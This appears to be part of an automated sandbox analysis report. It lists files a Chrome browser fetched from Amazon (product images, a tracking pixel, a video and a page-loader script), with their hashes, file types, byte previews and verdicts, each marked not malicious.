                                                                                                                                                                                                                                                                      SHA-512:AF15858BB9C8C352F3343599C240FD25E23F3869783B145DAF62E391CA452652D87EB89D2358DE1B2B7EB45EBC2539CFB95F3CC09DAAA7F6720D5760AEA9A452
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71KMBwNy8pL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@....".................................................................!."1A.2Q#aqrt....356BRUs......4bcu......$%DSTd.....C..................................................!1Aq."2a...34Qr.....#...RSb...s...c...............?..p..q.}..WS.l.L....D.....U..P..I:.=..E..T..!eC.yq.g.;.p.F9.F...|.B...W.Ac]RNGSU1?..j.5..OM.#.R...F.{..F.n..3.......r.....<}w......7....n.jT.hD."3.bB(...a.j....s."..U..`.H....T?..EY...v..#B..i.K.AR..'>^.6?.^g.\....X.......D..K...dO..!vob.S5..5-\.Y.e......3....O/V....{....bp..>...S.....B.+..Oo....g..dy.7(.#..a.vo.\.K{.<.5.D...sc..b..w...o..Q/..1...uU......]B.v.{.)f......q...8....9Q.._..5.7..Y..G<..R..n.0J.....gs..j.k.L?_.....s..[t\iw.}.....M.}hq%.,....L..8.$..6.p.6o.n.8$gB..'B..Sy.4q........m.......O,5..eIgy.......Yq..R.Gu.}...@`vq(F.u*..H9.|.]B.........A^...........5.*..[.&.CH.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):21886
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9430396779644585
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:QmQSvMbCu42YK4kH5xLtfK/x1PIgVCHjODF04Gi9eA49H+zR//zBoR3w/JaHP9MS:QpiMbO24kH5xLCcfCp04GiUH+x9zxavh
                                                                                                                                                                                                                                                                      MD5:3B842963D3087E0456EF11185D7B8C17
                                                                                                                                                                                                                                                                      SHA1:B0A42F9EB45B26B6CA340C73FB205076DEE03177
                                                                                                                                                                                                                                                                      SHA-256:55546FFCB3DB6E848756B5593FC60AD4936824435CFC529BDE66A529106E44F3
                                                                                                                                                                                                                                                                      SHA-512:DD7EBAA73B833EEDF4A4755040633A49ABCA96D11D5545972A221E0EE9E6AD25CBF4E6BB5DE9DADA4A59020086A603B99878F34EE426495E5FA711F2801214CA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41iXOCSvWNL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................X...........................................................................\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.`\.j.6.$.................-.2.-.2..L^.. .bs,./..b..(.b.e.9NS..e.tL.SH.@..........T.x.R;Q.*.7.6.K7..jF..Y.q>...z;:.......g.}.....O.....e.!...mM<...V.%........G..P6... .ii7L..................?..........oV......X...ZK...#....,<...K...w.qdS...Ay..b5.......#......J.../.@x...~ .l.5.zI.>...........Kmut....dD..G....-...u..8.y......m.......l.7ogm...n...T..D.g..m......z~....g....MY$7..!.U.<.P.........z~..O....x.D'..5.XU...~:....~..#..9./d.x...l..~.Y.....9...uc..M.....O....x....`......+K..5..7.p...........[...S.#....m...9..rX,....l...F...a.._b+=...G.W..gY.0m..zh.....E..Pn.?..................Dq..jfek.N....d8.>.dq.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ISO Media, Apple iTunes Video (.M4V) Video
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):229376
                                                                                                                                                                                                                                                                      Entropy (8bit):7.812461895130519
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6144:SCQk4Bo6xYxKtpfkbUlBZfjqt/muhZrsd+:LatpfkbU/1jqdmuhZm+
                                                                                                                                                                                                                                                                      MD5:6F4B45DAB88BD6263EB116167BDF7289
                                                                                                                                                                                                                                                                      SHA1:BAF437EAFA9FD4F8D21F696A39CA15502BC4F25B
                                                                                                                                                                                                                                                                      SHA-256:6AEA85D6033932C04EF866954B19DF85AA915B064D878A421A57451891577B1F
                                                                                                                                                                                                                                                                      SHA-512:6294C8CF4FFBE85E0148BA5E133725D359477206F3DFCA6A032933594773C3410691396975AEC6CEE11133F807A810431F41D380C91FFFFB123B4538D85FF9FD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/ef60c95b-8d7d-400d-9723-39a3458ba35a.mp4/productVideoOptimized.mp4:2f7ecbfffc568e:0
                                                                                                                                                                                                                                                                      Preview:....ftypM4V ....isomavc1mp42..Z.moov...lmvhd.....G..G.......h.................................................@..................................!iods.......O..).................-trak...\tkhd.....G..G...........h.................................................@........h......mdia... mdhd.....G..G...u0...PU......<hdlr........vide............ETI ISO Video Media Handler....eminf....vmhd...............$dinf....dref............url .......%stbl....stsd............avc1...........................h.H...H.........Elemental H.264........................pasp...........?avcC.B.....('B...B.@_..(@@@P..#P..H....................(. ....btrt......WH........stts...................@stss...............................1...........#...'........... cslg...........................(stsc....................................stsz...................Z...............o...........=...................t...P...............y...............1...............9...........s.......................?...................4......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (538)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2336
                                                                                                                                                                                                                                                                      Entropy (8bit):5.325315075451192
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:8qaGfCntpCntD7/V8Bd+w6jrHusTGJ0nBfdyziit8ZcHF:3aVcb66jrHuseatdyxtEcHF
                                                                                                                                                                                                                                                                      MD5:C9647D6B01E0617025076B05E7BED1EB
                                                                                                                                                                                                                                                                      SHA1:39E37C18AD6508723B664C873AFA6F02DA8D6DAE
                                                                                                                                                                                                                                                                      SHA-256:7399F4490F05A081B965475317099CCDC6245DC1FAEF8B0BC5E500E5FF5C595A
                                                                                                                                                                                                                                                                      SHA-512:C8DFDD9A1ACF05FD06F2C20D3F69B0A224AD95D6CD14B1C769D76C6C5FDAC8E9A345A5C9959DE58C32E52EAB3AF0BAB3B9B8D446A84F7B2147472232A330DC12
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(d){var g=window.AmazonUIPageJS||window.P,q=g._namespace||g.attributeErrors,f=q?q("AmazonRushAssetLoader","AmazonRush"):g;f.guardFatal?f.guardFatal(d)(f,window):f.execute(function(){d(f,window)})})(function(d,g,q){function f(a){l&&l.count&&l.count(a,(l.count(a)||0)+1)}function m(a){return[].concat(null!==a&&void 0!==a?a:[])}function r(a,c,b){a.addEventListener?a.addEventListener("error",c,!1):a.attachEvent&&a.attachEvent("onerror",c);a.addEventListener?a.addEventListener("load",b,!1):a.attachEvent&&.a.attachEvent("onload",b)}function x(a,c,b,h,e,d){if(a){a=document.createElement("script");r(a,e,d);if(c)a.textContent=b;else{a.async=!0;if(e=h)e=-1!==b.indexOf("images/I")||/AUIClients/.test(b);e&&a.setAttribute("crossorigin","anonymous");a.src=b}b=a}else c?(c=document.createElement("style"),r(c,e,d),c.textContent=b,b=c):(c=document.createElement("link"),r(c,e,d),c.rel="stylesheet",c.href=b,b=c);(e=document.getElementsByTagName("head")[0])&&e.appendChild(b)}function k(a,c,b){retur
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4956
                                                                                                                                                                                                                                                                      Entropy (8bit):7.80136775427975
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TzZ7l7SLhalSVYwS/3mflIrYdDkQsdLFVtRy0SI1V8ZRbUfNdH:p78LkIVYwS/3mdFDkQsVzygVQRbUfNdH
                                                                                                                                                                                                                                                                      MD5:221B361F3870A3260226B289ADF353E2
                                                                                                                                                                                                                                                                      SHA1:73F3B7C97FDB69DEB63D0DD10196F11028737870
                                                                                                                                                                                                                                                                      SHA-256:84D6710CDF9D1A9BC5D66215A790AD53008DAE793200327B91B816DD0B6EAA66
                                                                                                                                                                                                                                                                      SHA-512:FE937DD80F435B5C50861B07BE246FBCA22790DC0CAA05917879AA66BE78F2717851C7E7063DE8A2A64E8F242E159D9F6DFB25352EB6F1D37626E36FFB14D350
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5......................................................................................................0.B.....d........>.....k.#d<kl#d.....Z..gNjn..........gS..].Y....[3..#..!.H.e(X.bW.;B<.(4...8s..,w.qZ..i..C6..............Y..9.S.....f..}1Q..M.M.'&jS2.....b.]/;&...#..o......9..~~tG....V<yX....>cx.M....&suVr.=..?M..R...'.Kf...6....\.&........"x........1.V-.rbF6.R...n.T.....4.}.......d..T......h.......D9.y.syO..(...c;{gp...1..Fn.^.=.uW...P.....r.a.q.:...P7.>|.&.........z./Z....%}.N=.z{.(.J...$...M..D..[.{...#G....`^.k.8.b..x...0..;...|n.-nN.u`r......i...&...(.(<..Zr..WUr...0........................................,...........................4...!0."1A #2p@............:3h....o..............@.@.B.B.D.F.F...*F..@.Z{yS..c...dO..........V......].......2ZV..\.\..Y.(.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4642
                                                                                                                                                                                                                                                                      Entropy (8bit):7.920986044399299
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:7dF8GWWV+w/xxV+6X8mbsrTW4sR72Y+JENUoVbu:JFEPw/j/0TYRSxJ+a
                                                                                                                                                                                                                                                                      MD5:5AAEB8DD8F1332112BB72F6AD63E773B
                                                                                                                                                                                                                                                                      SHA1:758513490AE29119946307C1BFEC15BCCE2715C6
                                                                                                                                                                                                                                                                      SHA-256:CD501BCEE39A686988130F30DFED2BD8F5BE82C17977C5114114BD94E8290B4B
                                                                                                                                                                                                                                                                      SHA-512:0723AACCF035AD63B726C04E3B870D274C997219D9A6979C11298188445A5EA3380EA9183BDE2471606CDED67F43AB8A2A6194876184FA8FF658BB82ECDB4BA1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..............................................................................#.......................................................................t...."..............................................................!..1..AQ2aq..."BRS.....#bs......3T.$....4rt..................................................!1...Qq..Aa.."2...#$R..Tbr................?..dRH...+..).U.*.)..0..O.[.[..R...,....J...r...~.Ss.o.}.....uhB..T..........<6.j.\...|u..>=.."~./.nIl...:...J..-...I$x.m........-..}7W.g.....u.........|2v..{3...I.g89..o...s$........-{..[R...X......X'......w..%.H......cL.....f.P....&........?|.........._....%sm...1{S..h?R..9.....j....24..J/W.|.>g..^:...z....]..."g.*T..O.;.1....i..41..m;..8[....U<B*.}.Z....Q$...u.........n%.\..~#.:Y6.q.:.......#..mD|w.H..`Yw.Ad#m..6...Mg.:dx..%..d.`.+....5cK.VM..N....{u...v.[=..X......o.%6...U..K.`e.."..8.?...m....}.YW\y.Z..{...ut...3Z.:..$.]4e....}f.._.N..n..C.I...k.b.I....@.....#>..V.w..t.x.a..[....W..I.v.$
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):10486
                                                                                                                                                                                                                                                                      Entropy (8bit):7.850239289796459
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Aebica+zf52Yc5sYBvLuiwLYAAN2315gMzbdjNnDTiHLzB0BSPF7gJU6R0Ah:ZbPBL52YB3y2FmMfTDOHBd7F6vh
                                                                                                                                                                                                                                                                      MD5:D9119D9BD2D2DCAC171E26D38FFC3C80
                                                                                                                                                                                                                                                                      SHA1:1C46A27BA75301E61F5F6A49614DB45C3A686353
                                                                                                                                                                                                                                                                      SHA-256:0703A843E6C7A5811E3FDC5356354FAABC03202AFC0065CA083055919BD7F9BF
                                                                                                                                                                                                                                                                      SHA-512:AD08C7A8339CA633B682D60B497E1E6AD3883C92CEB71C463E74A69B4BFA326C9E3887DA6BAE2E459D5A3C3751E247720879911E794D2A2EB68BEE93DD4F511E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6..........................................................................................................................p9p9p9p9p9q..................<.v....$~$.1..~.v..|kgk?0}..>.....V.Tn.Z.6..f6..D./?a....h..Ujf.Lr$............k..:........4....\L.m......A.&..v..]2.........M..x.7.).?...f4..;om9.:.w.]....F...L.............1n..G../...k;....2....V.vH....5..^_......Zdk.Z.s|`...k...].U..5...2.vtIjF.j..^.C...........1...ZO.2.q#v~....m.>]..2m.h.hf..m......j.&_.y.dU..D..Uh.\J.Y.`.h.{.v....H.j..k..k.............5./.O.g.......;.1..W5..dX0Z.....[r-....g..[..R:}]......W4sh.U.oY..1*.;.._..Y...@.@..........K.."..#$.E.@.&.N..{..N....{.F+..+^&..^.&........^.Rw....J.U.n..cX..Tv.....(...........#....*.........>q.sh.k.>.$..k.k.\...c....|2.qR....;~~.Wb.}9]Q......8}Di@.........0Y.vF-..S
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):21403
                                                                                                                                                                                                                                                                      Entropy (8bit):7.95064218890698
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1reCA6Y7Z2EJVmtT5klBOFgYA69e17L7jj1Fs8nJMH8jdK:1r3W7NHmtdgBODVwl7n1Fs8i0dK
                                                                                                                                                                                                                                                                      MD5:E64F8360EA3135B7CC215BF01510E68A
                                                                                                                                                                                                                                                                      SHA1:852033D5266DA0E4C7D2168811B6115F90FF47D2
                                                                                                                                                                                                                                                                      SHA-256:D74856BE33DEE19A494D2075EBB87A4FDA125B6C98670C16BC92E8EC5C59A644
                                                                                                                                                                                                                                                                      SHA-512:6861731179AFAF17E1E85CD790A43DC85FE1D67C756EE229A037C05E6F24D0B9EA25863EDC39ECBD00DF4483D2191BABB4A3BCDAC9E8056AFAE4D282D7FF9A9A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."................................................ ................Eaa...r...............Q..hdn=_f............Yy.}.F....c..}.............{T.F...c>ZZgW..x.,...........x...........<..k:...Kl..W.dfU..u..u[..H.`.......q6T.....G.-._...p.].}....JT...........;/.od.......n..W..e.....^.Q..f......(..{*Jav..:...-.5z..n..v.|..-............lU{W.y.{X..s=.l...O7...U3.....=..;f.......F....l..+.zHq.=.U.....2<..i..p.;.=Q..........A...<R^.n..nZ.<D......dKO...............p....D..%.8..DL.Fg...&.{q..]'.yOC......-|..R.....D..6...O=......g}.s.5w..T.........o.6.S%..w|....7].....<dn.....a.. h..k..s$......w...I[..O...N.O.du..^..h....%:GGi\,z.........G..o..Z68...G.l.>z.3S.k..2=..W.3.:).y....x..V..............'.v7.........8.\u..MW..W...D...........v..?.....>7I.....|......j...[.;....../u...1..G........I.............
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):44956
                                                                                                                                                                                                                                                                      Entropy (8bit):7.957307880486643
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:rB9D8khQda97D8ZuTLmuhzWM0BQL9kHh199q+hwaSief6gT8H7FGLSwhMED5/9Lh:rBG2QwDM+LmGzYBW949ZdxORMGewh/DV
                                                                                                                                                                                                                                                                      MD5:B6D760A816C75C3591BFF8D2D612CB41
                                                                                                                                                                                                                                                                      SHA1:EB25FD7908C7321008A812C409D174814BAFE707
                                                                                                                                                                                                                                                                      SHA-256:C2E0DA50F17EC793BD5584359182482D6E37CA7CE4521D423CED6B0350FBCEE2
                                                                                                                                                                                                                                                                      SHA-512:86F463DCFD6F3F515162EA7263C732A1F90895449933D33C5EC9A7EC15027D602B8E922A81E4B0A0CD289285123C7525BB825E713D89FAED66FC8BFCD0B556BC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................T.............................!.1.."AQ2.a.#Bq.......$Rr..%..68U.....&379FXchxy.......................................H...........................!1.AQ.."aq......2R....3Bb..#.'46v..8TUct...............?..C..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1......N)L`.?...3..#........%G.(Z..(...._....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6194
                                                                                                                                                                                                                                                                      Entropy (8bit):7.849532151399675
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TpeLTWL76RFrHMpgrw73RRgUp/j50HlzHnzzhk4140gI+7nztlim3F/VRuFo:1xhf73RBL52tk41oX7nzSm3tbuFo
                                                                                                                                                                                                                                                                      MD5:FA2F3F2C586A38E6E1D3749D7754DB8E
                                                                                                                                                                                                                                                                      SHA1:4C06F9B1BFBB010F51ED5F2DD32F190B535155FF
                                                                                                                                                                                                                                                                      SHA-256:4EF4297392FA55766C61CA396A7DEF76010BA7079FCA9E850AD12FD1D9233C7D
                                                                                                                                                                                                                                                                      SHA-512:D7CEB9803A8212B9CDF29826C793A70A37B5BEDA68EDDA86C1F63BCAD22A124A967EFFFDF7B9C45F7E446E84461DAB661B1A7FFEFBB448092B4F9007B24CEFC3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5...........................................................................................I..t.^t.^...H...z...LfR.8.......{]..~...}...9.........8=.4...K.....O.~....1..hk....OUS.L.......>.8.^`....8........'y...m:.7.2B.C....5...y....[......k.z....c..>.......:..~o.:....m|.G...75}/q..-.....,..^/R.........Y...4.~l.r..x.@...?:.~...uK...uJ........u. g~.\.Fw^t._}.....{..'....?__..a.......>.S./c]..PF....6.Gkfp._._&.....iXdFW........X7...K....ip..q..F.Yo@...n......z..,r....u.|L.4j..$.jS.I...*.=.E/r..3<]..vg"x;.G._B. ..{..=....S.0s.P.ZE.fg..j.3..*z...5.K..g7.x..S...;N...!f..r4^..........\..k........-I......K....*]y.".#...k............u.w.P.HC................................1..........................1..!02.. ."ABa#3@QR`p.............I3".y.(......".%*.52>..^..T.{./u/t.{.U.9.*.x.O.GT*.l..]I..fI....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 204x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5572
                                                                                                                                                                                                                                                                      Entropy (8bit):7.914613394862699
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TsWxxJMQ/1uf4uQEIfy8IbDSAHWeRUjhGbUQ/bd1MBJZoBQCwICwbC8oopsL/dvc:4WxxZuwuQEi+buCUsbx/bD2prgpsTd0
                                                                                                                                                                                                                                                                      MD5:5D0D40620A3BA1203F80EB487A7AEEC7
                                                                                                                                                                                                                                                                      SHA1:C1E9FCAC746EF05228D209FD21BE8B22DCB33FFC
                                                                                                                                                                                                                                                                      SHA-256:6BEC2E1299B6E50A956EDBE60EAE74C96250240BD00384A3E8CA0FF8992A4121
                                                                                                                                                                                                                                                                      SHA-512:DD4E7A78E0727B14C973BB14A93837FEAC91C2A40DCD3F5649F06973F1CF86A444E8842DF26F3788077501BB51BC20AF567B3E20D2D08E9621AE9780B86CC03E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61Q2hRo4BCL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................1.!A."2BQRaq.4r......s..#3b......5t.$c.............................................!1A............?..Z" ""..`IGU....z...y..W.!6.Yp.G...]919.{.5.y...+.,..f.Z^:...o.......Hy..>..3....|..f.=..].5A.....[.......=f|.....$y./.`.;...p-.o......w.....Pl.....[.s6y#....<...NVkck.......:M......v.#...~..H*....=..lr.:.[.hPU...............^....,..y..V.+.......H...DQ0.~...#n.{.4/+m7.lZ.C..j.x^.....co........a.....v..{.W.u..kU;u.c.>Z.5.m...]..z.[..9.j;..Y..y......^'~.....U.lO..7k.i.4...RJn_ara~.R.V..X.T..V........q]j.)..w...x.8..7o.].rYa...*|...81u._...1>2.n.G.ybf..:.l_...7gr.....%6/.......,..68..{..\jH......n.....x#.'.=ED.[..{o/..HRw..jZ........S..-O..F..." ""." ""." ...y..s..\.5....6kCE.'@..o....>./.4.....%..Fy..g.D.1Q.H;o&....z.9.M.....>2Z
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:APAVCQJMFK78QJEV1PMZ$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3DAPAVCQJMFK78QJEV1PMZ%26ctb%3D1%26sc0%3Ddesktop-1-active%26cf0%3D51718%26pc0%3D51718%26ld0%3D51718%26t0%3D1724264970912%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DAPAVCQJMFK78QJEV1PMZ%26aftb%3D1%26lob%3D1:51717
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):9650
                                                                                                                                                                                                                                                                      Entropy (8bit):7.921401363311506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:XWYnxO4SOPdbw3eIIjALWOIg1Sxk7SufiOIEUvpb2B15giRRIWAjLBo+2S:XtnxOtO1KvIjALW1xkeZOIvkBQ3d+S
                                                                                                                                                                                                                                                                      MD5:BF7838B60D41AC5866F8DE735215FC8B
                                                                                                                                                                                                                                                                      SHA1:35A30A074555C1E01F489B5C28AC91F1708CC3C7
                                                                                                                                                                                                                                                                      SHA-256:FAA13D8245F7116DD8E9B46B57FD4B0D732DEB6FB14507D9DA6785EC907416D6
                                                                                                                                                                                                                                                                      SHA-512:57A32571D6AA2E7321FE116267446783E7D21CF61177428B056991493A31B6DB781238FEDE835D5CDEBCA20A1AF34BB9EC7C0A11917855D06A00020860F8FB9C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5......................................................................eF.0.......F8.9..]...Z....4./.|.F.=)..}!...qe..<.0. ..Q..N5y.R].....,O=T7U...O.qz.}...F..}V..C..'.....d.%\..c=_...31}[.\..O.....B.`..Y&..E.r.zE.u.....c..v.>s.+[...GF...o.%....2K...eh.U?<U.[x...U/....oE.{.Z....m..l.&(d}...M7.<.....6>.?..f.}|.......m....'.j.M.._.J.SZ.{._...YW...'R.....{.cT.....V@^~...9.cm3..2...2...R'S5lt.C|...]..{/Yc.:.I.6F..w... F..?..l..e`v3m_fG;..W.O.{m.JU"....f.ar.a$..9w...K......K.....P.a.].].Nw.e........@9.G.......9.....<..b.wGF........m{.....l...e..{...B.S................2.\1.m...]|..P<.s..$q.-T.q@..N..|[|`........8.[....n...o.m.lZ..|2.......,.6..7.Gs.0..gl..y..y........d.....N..z.:.....Fd.z...\.Y.KX..P.)D/g./..2...]b.}E..B"..S.C..|.T.Mo.X].54K.vl|..N...b...j......J.2M..U.?X.....;#G..7
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
